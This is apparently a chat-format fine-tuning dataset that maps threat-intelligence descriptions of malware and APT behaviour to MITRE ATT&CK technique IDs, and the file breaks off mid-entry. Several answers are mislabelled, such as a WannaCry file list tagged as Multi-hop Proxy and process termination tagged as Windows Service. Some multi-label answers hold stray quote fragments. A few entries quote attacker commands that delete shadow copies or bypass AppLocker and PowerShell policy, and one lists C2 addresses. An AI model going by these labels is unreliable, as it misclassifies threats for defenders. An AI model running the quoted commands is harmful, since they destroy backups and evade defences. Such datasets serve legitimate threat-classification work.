- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kwampirs uses rundll32.exe in a Registry value added to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RainyDay can use tools to collect credentials from web browsers."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Diavol can receive configuration updates and additional payloads including wscpy.exe from C2."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WhisperGate can use a Visual Basic script to exclude the `C:\\` drive from Windows Defender."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PLEAD has the ability to list processes on the compromised host."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WINDSHIELD can gather the victim user name."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In one version of KeyBoy, string obfuscation routines were used to hide many of the critical values referenced in the malware."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can compress data with Zip before sending it over C2."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Meteor can use `bcdedit` to delete different boot identifiers on a compromised host; it can also use `vssadmin.exe delete shadows /all /quiet` and `C:\\\\Windows\\\\system32\\\\wbem\\\\wmic.exe shadowcopy delete`."
- },
- {
- "role": "assistant",
- "content": "T1490 - Inhibit System Recovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Consistent with the perceived goal of credential harvesting, the threat actors dropped and executed open source and free tools such as Hydra, SecretsDump, and CrackMapExec. Forensic analysis indicates that many of these tools were executed during the timeframe in which the actor was accessing the system"
- },
- {
- "role": "assistant",
- "content": "T1110.002 - Brute Force: Password Cracking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "menuPass has used esentutl to change file extensions to their true type that were masquerading as .txt files."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Final1stspy creates a Registry Run key to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lizar can collect email accounts from Microsoft Outlook and Mozilla Thunderbird."
- },
- {
- "role": "assistant",
- "content": "T1087.003 - Email Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ferocious Kitten has attempted to convince victims to enable malicious content within a spearphishing email by including an odd decoy message."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "b.wnry — Bitmap image used as desktop wallpaper (shown in Figure 2) - c.wnry — Configuration containing Tor command and control (C2) addresses, Bitcoin addresses, and other data - r.wnry — Ransom demand text - s.wnry — ZIP archive containing Tor software to be installed on the victim’s system; saved in TaskData directory - t.wnry — Encrypted DLL containing file-encryption functionality - u.wnry — Main module of the WCry ransomware “decryptor” - taskdl.exe — WNCRYT temporary file cleanup program - taskse.exe — Program that displays decryptor window to RDP sessions - msg — Directory containing Rich Text Format (RTF) ransom demands in multiple languages"
- },
- {
- "role": "assistant",
- "content": "T1090.003 - Proxy: Multi-hop Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Finally, OverWatch observed AQUATIC PANDA make multiple attempts at credential harvesting by dumping the memory of the LSASS process3 using living-off-the-land binaries rdrleakdiag.exe and cdump.exe — a renamed copy of createdump.exe. The threat actor used winRAR to compress the memory dump in preparation for exfiltration before attempting to cover their tracks by deleting all executables from the ProgramData and Windows\\temp\\ directories"
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory', 'T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Shathak or TA551 is the name some security researchers have given to a specific distribution method that uses password-protected ZIP archives as attachments to malspam. It has used Word document templates targeting English-, Italian-, German- and Japanese-speaking recipients. Shathak/TA551 has been active at least as early as February 2019"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware’s next action is to check if the execute privilege is SYSTEM. When the execute privilege is SYSTEM, the malware will get the process “Explorer.exe”, get the token of the user that launched the process and impersonate it. It is a downgrade from SYSTEM to another user with less privileges to avoid affecting the desktop of the SYSTEM user later"
- },
- {
- "role": "assistant",
- "content": "T1134.001 - Access Token Manipulation: Token Impersonation/Theft"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Commands received from the control server are encoded DWORDs - After decoding, these DWORDs should be in the range 123459h to 123490h"
- },
- {
- "role": "assistant",
- "content": "T1132.002 - Non-Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Babuk has the ability to enumerate files on a targeted system."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sibot can decrypt data received from a C2 and save to a file."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PsExec, a tool that has been used by adversaries, writes programs to the \"ADMIN$\" network share to execute commands on remote systems."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Emotet has been observed encrypting the data it collects before sending it to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT40 relies heavily on web shells for an initial foothold into an organization. Depending on placement, a web shell can provide continued access to victims' environments, re-infect victim systems, and facilitate lateral movement"
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In response to historical disclosures detailing TA416 PlugX malware infection and encoding methods, the group appears to have adopted a rapid rate of development for their PlugX payloads. The group uses different legitimate PE files to initiate sideloading, as well as a variety of PlugX DLL loaders including the PotPlayer and DocCon versions noted in this publication. TA416 also uses different variants of the final PlugX payload in which the communication routines are observed to be different when closely analyzed. Additionally, the payload DAT file decryption method has evolved regularly since the beginning of 2022. Several observed decryption schemas and a sample configuration are included below with date ranges detailing the evolution of observed PlugX payloads"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "admin@338 actors used the following command following exploitation of a machine with LOWBALL malware to obtain information about services: \"net start >> %temp%\\download\""
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mettle: A malicious campaign based on IP addresses in Vietnam (C2 210.245.26.180:4441, scanner 118.70.80.143) and mettle open source control module.. Hajime: This round of update from Hajime also includes GPON exploits.. Two Mirai variants: At least two malicious campaigns are actively exploiting this vulnerability to propagate mirai variants. The second one is already known as Omni.. Imgay: This looks like a botnet under development. We only observe its download behavior and no more follow-up actions."
- },
- {
- "role": "assistant",
- "content": "T1588.006 - Vulnerabilities', 'T1587.004 - Exploits', 'T1203 - Exploitation for Client Execution', 'T1595.002 - Vulnerability Scanning"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater has used malware to obtain a list of running processes on the system."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MacMa can collect IP addresses from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can gather system information, the computer name, OS version, drive and serial information from the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carbon uses the \"netstat -r\" and \"netstat -an\" commands."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Next, REvil checks the configuration field dbg to see if it’s running in debug mode. If that is not the case, geolocation checks based on the system’s language and the keyboard layout are conducted so the ransomware does not attempt to encrypt files on whitelisted systems. The following are whitelisted system language IDs for the analyzed sample"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoetRAT has the ability to overwrite scripts and delete itself if a sandbox environment is detected."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Andariel has inserted a malicious script within compromised websites to collect potential victim information such as browser type, system language, Flash Player version, and other data."
- },
- {
- "role": "assistant",
- "content": "T1592.002 - Software"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Editor’s note: Following publication of this blog, it came to our attention that AhnLab encountered what appears to be an earlier version of SDBbot, described in their recent Q3 ASEC Report as a “malicious SDB file. AhnLab describes delivery of the malware in South Korean campaigns as a secondary payload to the FlawedAmmyy RAT. TA505 has been active in South Korea in 2019 and frequently distributes the FlawedAmmyy RAT, but we cannot verify the connection at this time"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Honeybee, malicious files were decoded prior to execution."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RARSTONE obtains installer properties from Uninstall Registry Key entries to obtain information about installed applications and how to uninstall certain applications."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Volgmer can execute commands on the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Egregor has used tools to gather information about users."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The actors used valid credentials obtained using MimiKatz variants to escalate privileges. We’ve observed Mimikatz being executed both from the file system of victim hosts and via PowerShell cmdlets executed via Cobalt Strike BEACON. Actors have gained access to credentials via exported copies of the ntds.dit Active Directory database and SYSTEM and SECURITY registry hives from a Domain Controller"
- },
- {
- "role": "assistant",
- "content": "T1003.003 - OS Credential Dumping: NTDS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to schedule remote AT jobs."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Browser credential stealing: Capability to steal credentials (username and password) from the installed browsers, Microsoft Internet Explorer (MSIE), and Google Chrome browser. Figures 7 and 8 show the code sections responsible for stealing the credentials from MSIE and Chrome browser respectively"
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GrimAgent has used Rotate on Right (RoR) and Rotate on Left (RoL) functionality to encrypt strings."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Silent Librarian has used collected lists of names and e-mail accounts to use in password spraying attacks against private sector targets."
- },
- {
- "role": "assistant",
- "content": "T1110.003 - Brute Force: Password Spraying"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Traps 4.0 can be configured to protect the processes that are cited as being abused in this blog from loading malicious code"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One notable TTP observed by APT29 was the hunting for passwords stored in SYSVOL. This technique relies on passwords that are stored as part of Group Policy Preferences."
- },
- {
- "role": "assistant",
- "content": "T1552.006 - Unsecured Credentials: Group Policy Preferences"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Astaroth collects the timestamp from the infected machine."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bankshot can terminate a specific process by its process id."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 sent spearphishing emails containing malicious Microsoft Office and RAR attachments."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "From our analysis, stealing keystrokes is the main function of RunningRat; however, the DLL has code for more extensive functionality"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerShower has added a registry key so future powershell.exe instances are spawned off-screen by default, and has removed all registry entries that are left behind during the dropper process."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkWatchman reports window names along with keylogger information to provide application context."
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has created a scheduled task named “AdobeFlashSync” to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot has the ability to capture web session cookies."
- },
- {
- "role": "assistant",
- "content": "T1539 - Steal Web Session Cookie"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Conti uses a multithreading technique to fast encrypt all the files. This routine takes seconds to just a few minutes depending on the number of files on the machine. Each sample has a unique extension that the malware adds to the encrypted files. While using Cybereason with prevention mode off to allow investigation of the ransomware execution, it is possible to see the encryption activity and the creation of new files"
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Using valid credentials, CARBON SPIDER moves laterally through victim environments using RDP and occasionally SSH. The adversary typically uses PS to run Cobalt Strike but occasionally writes Cobalt Strike stagers or KillACK backdoors to disk. Occasionally, CARBON SPIDER has deployed the legitimate GoToAssist or TightVNC tools to provide redundant control of hosts"
- },
- {
- "role": "assistant",
- "content": "T1021.005 - Remote Services:VNC', 'T1021.001 - Remote Services: Remote Desktop Protocol', 'T1021.004 - Remote Services: SSH"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "(Source: SecureWorks) In multiple instances, CTU researchers observed artifacts from unsuccessful attempts to create a web shell on web-accessible JBOSS-based service desk software, followed by use of a functional shell to gain access to the environment"
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShimRat has registered two registry keys for shim databases."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It will run the newly downloaded PowerShell script by running the following command via cmd /c: wscript.exe \"Office365DCOMCheck.vbs\" \"PowerShell.exe-ExecutionPolicy bypass -WindowStyle hidden -NoProfile \" The payload will then notify the C2 it has successfully downloaded and executed the secondary PowerShell payload"
- },
- {
- "role": "assistant",
- "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Group has used the command \"cmstp.exe /s /ns C:\\Users\\ADMINI~W\\AppData\\Local\\Temp\\XKNqbpzl.txt\" to bypass AppLocker and launch a malicious script."
- },
- {
- "role": "assistant",
- "content": "T1218.003 - Signed Binary Proxy Execution: CMSTP"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Brave Prince terminates antimalware processes."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Indrik Spider used \"wmic.exe\" to add a new user to the system."
- },
- {
- "role": "assistant",
- "content": "T1136 - Create Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkWatchman has used Base64 to encode PowerShell commands. DarkWatchman has been delivered as compressed RAR payloads in ZIP files to victims."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SDBbot has used a packed installer file."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gazer communicates with its C2 servers over HTTP."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Okrum's loader can create a new service named NtmsSvc to execute the payload."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PlugX has a module to create, delete, or modify Registry keys."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can execute commands from its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "File starts as mico-audio.exe and installs to C:\\Users\\%USERNAME%\\AppData\\Roaming\\google-chrome\\crome.exe"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Using Frame1_Layout for macro execution and using lesser known API calls for shellcode execution is known to be used by Lazarus. We also were able to find infrastructure overlap between this campaign and past campaigns of Lazarus (Figure 19"
- },
- {
